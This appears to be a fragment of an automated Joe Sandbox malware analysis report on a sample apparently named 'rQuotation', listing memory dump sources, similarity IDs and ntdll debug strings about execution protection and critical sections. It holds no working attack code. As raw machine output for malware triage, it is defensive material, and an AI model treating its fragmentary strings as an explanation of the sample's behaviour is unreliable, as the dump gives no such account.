                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01734725
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01734787
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01734655
                                                                                                                                                                                                                                                • Execute=1, xrefs: 01734713
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01734742
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0173031E
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017302BD
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017302E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01737294
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 017372A3
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 017372C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280